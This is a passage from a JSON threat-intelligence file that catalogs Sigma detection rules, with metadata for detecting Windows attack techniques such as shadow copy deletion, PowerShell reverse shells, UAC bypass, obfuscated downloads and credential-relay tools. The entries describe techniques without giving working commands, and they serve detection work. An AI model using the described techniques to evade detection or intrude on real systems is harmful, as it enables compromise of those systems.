"https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml" ], "tags": [ "attack.discovery", "attack.t1518.001" ] }, "related": [ { 
"dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4fe074b4-b833-4081-8f24-7dcfeca72b42", "value": "Security Tools Keyword Lookup Via Findstr.EXE" }, { "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", "value": "Deletion of Volume Shadow Copies via WMI with PowerShell" }, { "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", "meta": { "author": "Julia Fomina, oscd.community", "creation_date": "2020-10-05", "falsepositive": [ "Use of Program Compatibility Troubleshooter Helper" ], "filename": "proc_creation_win_lolbin_pcwutl.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", 
"https://twitter.com/harr0ey/status/989617817849876488", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwutl.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", "value": "Code Execution via Pcwutl.dll" }, { "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "meta": { "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2018-12-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"55f0a3a1-846e-40eb-8273-677371b8d912", "value": "Outlook EnableUnsafeClientMailRules Setting Enabled" }, { "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", "meta": { "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "creation_date": "2019-10-26", "falsepositive": [ "Commandlines containing components like cmd accidentally", "Jobs and services started with cmd" ], "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1134.001", "attack.t1134.002" ] }, "related": [ { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "15619216-e993-4721-b590-4c520615a67d", "value": "Potential Meterpreter/CobaltStrike Activity" }, { "description": "Shadow Copies storage symbolic link creation using operating systems utilities", "meta": { "author": "Teymur Kheirkhabarov, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Legitimate administrator working with shadow copies, access for backup purposes" ], "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "40b19fa6-d835-400c-b301-41f3a2baacaf", "value": "VolumeShadowCopy Symlink Creation Via Mklink" }, { "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-14", "falsepositive": [ "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], "filename": "proc_creation_win_servu_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml" ], "tags": [ "attack.credential-access", "attack.t1555", "cve.2021-35211" ] }, "related": [ { "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "value": "Suspicious Serv-U Process Pattern" }, { "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) 
in an URL combined with a download command", "meta": { "author": "Florian Roth (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2022-08-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_obfuscated_ip_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://h.43z.one/ipconverter/", "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", "https://twitter.com/fr0s7_/status/1712780207105404948", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", "value": "Obfuscated IP Download Activity" }, { "description": "Detects potential arbitrary file download using a Microsoft Office application", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community", "creation_date": "2022-05-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_arbitrary_cli_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", "value": "Potential Arbitrary File Download Using Office 
Application" }, { "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", "meta": { "author": "frack113", "creation_date": "2022-05-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_pubprn.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Scripts/Pubprn/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216.001" ] }, "related": [ { "dest-uuid": "09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", "value": "Pubprn.vbs Proxy Execution" }, { "description": "Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.", "meta": { "author": "X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_reg_loader.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1053.005", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"86588b36-c6d3-465f-9cee-8f9093e07798", "value": "Scheduled Task Executing Payload from Registry" }, { "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "meta": { "author": "@Kostastsale, @TheDFIRReport", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_emoji_usage_in_cli_3.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_3.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "f9578658-9e71-4711-b634-3f9b50cd3c06", "value": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3" }, { "description": "An adversary might use WMI to discover information about the system, such as the volume name, size,\nfree space, and other disk information. This can be done using the `wmic` command-line utility and has been\nobserved being used by threat actors such as Volt Typhoon.\n", "meta": { "author": "Stephen Lincoln `@slincoln-aiq`(AttackIQ)", "creation_date": "2024-02-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_volume.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_volume.yml" ], "tags": [ "attack.execution", "attack.discovery", "attack.t1047", "attack.t1082" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", 
"tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c79da740-5030-45ec-a2e0-479e824a562c", "value": "System Disk And Volume Reconnaissance Via Wmic.EXE" }, { "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", "meta": { "author": "frack113", "creation_date": "2022-08-19", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_reg_modify_group_policy_settings.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1484.001" ] }, "related": [ { "dest-uuid": "5d2be8b9-d24c-4e98-83bf-2f5f79477163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ada4b0c4-758b-46ac-9033-9004613a150d", "value": "Modify Group Policy Settings" }, { "description": "Detects execution of renamed version of PAExec. Often used by attackers", "meta": { "author": "Florian Roth (Nextron Systems), Jason Lynch", "creation_date": "2021-05-22", "falsepositive": [ "Weird admins that rename their tools", "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. 
Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" ], "filename": "proc_creation_win_renamed_paexec.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.poweradmin.com/paexec/", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "value": "Renamed PAExec Execution" }, { "description": "Detects potential abuse of the \"register_app.vbs\" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-05", "falsepositive": [ "Other VB scripts that leverage the same starting command line flags" ], "filename": "proc_creation_win_lolscript_register_app.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", "https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolscript_register_app.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "28c8f68b-098d-45af-8d43-8089f3e35403", "value": "Potential Register_App.Vbs LOLScript Abuse" }, { "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", "meta": { "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", "creation_date": "2019-10-24", "falsepositive": [ "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." ], "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://learn.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", "value": "Usage Of Web Request Commands And Cmdlets" }, { "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-05-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html", "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002", "attack.t1112" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", "value": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE" }, { "description": "Detects potential web shell execution from the ScreenConnect server process.", "meta": { "author": "Jason Rathbun (Blackpoint Cyber)", "creation_date": "2024-02-26", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_remote_access_tools_screenconnect_webshell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blackpointcyber.com/resources/blog/breaking-through-the-screen/", "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_webshell.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b19146a3-25d4-41b4-928b-1e2a92641b1b", "value": "Remote Access Tool - ScreenConnect Server Web Shell Execution" }, { "description": "Detects usage of the \"TcpClient\" class. 
Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", "meta": { "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-03-03", "falsepositive": [ "In rare administrative cases, this function might be used to check network connectivity" ], "filename": "proc_creation_win_powershell_reverse_shell_connection.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", "value": "Potential Powershell ReverseShell Connection" }, { "description": "Detects the execution of \"forfiles\" with the \"/c\" flag.\nWhile this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.\nCan be used to bypass application whitelisting.\n", "meta": { "author": "Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2022-06-14", "falsepositive": [ "Legitimate use via a batch script or by an administrator." 
], "filename": "proc_creation_win_forfiles_proxy_execution_.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", "https://pentestlab.blog/2020/07/06/indirect-command-execution/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_forfiles_proxy_execution_.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", "value": "Forfiles Command Execution" }, { "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-24", "falsepositive": [ "Legitimate use of the impacket tools" ], "filename": "proc_creation_win_hktl_impacket_tools.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impacket_tools.yml" ], "tags": [ "attack.execution", "attack.t1557.001" ] }, "related": [ { "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "value": "HackTool - Impacket Tools Execution" }, { "description": "Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-27", "falsepositive": [ "Unlikely" ], 
"filename": "proc_creation_win_hktl_krbrelay_remote.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/CICADA8-Research/RemoteKrbRelay", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_krbrelay_remote.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a7664b14-75fb-4a50-a223-cb9bc0afbacf", "value": "HackTool - RemoteKrbRelay Execution" }, { "description": "Detects changes to the \"NoLMHash\" registry value in order to allow Windows to store LM Hashes.\nBy setting this registry value to \"0\" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-12-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_nolmhash.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a", "https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password", "https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_nolmhash.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98dedfdd-8333-49d4-9f23-d7018cccae53", "value": "Enable LM Hash Storage - ProcCreation" }, { "description": "Detects 
the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly.\nMeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.\n", "meta": { "author": "@Kostastsale", "creation_date": "2024-09-22", "falsepositive": [ "False positives can be found in environments using MeshAgent for remote management; analysis should prioritize the grandparent process, MeshAgent.exe, and scrutinize the resulting child processes triggered by any suspicious interactive commands directed at the target host." ], "filename": "proc_creation_win_remote_access_tools_meshagent_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-info.js#L55", "https://github.com/Ylianst/MeshAgent", "https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-dispatcher.js#L173", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_meshagent_exec.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "74a2b202-73e0-4693-9a3a-9d36146d0775", "value": "Remote Access Tool - MeshAgent Command Execution via MeshCentral" }, { "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": 
[ "https://github.com/Wh04m1001/IDiagnosticProfileUAC", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4cbef972-f347-4170-b62a-8253f6168e6d", "value": "UAC Bypass Using IDiagnostic Profile" }, { "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", "value": "Invoke-Obfuscation COMPRESS OBFUSCATION" }, { "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", "meta": { "author": "Micah Babinski", "creation_date": "2022-12-11", "falsepositive": [ "Legitimate use of the tool by administrators or users to update metadata of 
a binary" ], "filename": "proc_creation_win_pua_rcedit_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/electron/rcedit", "https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe", "https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rcedit_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003", "attack.t1036", "attack.t1027.005", "attack.t1027" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ 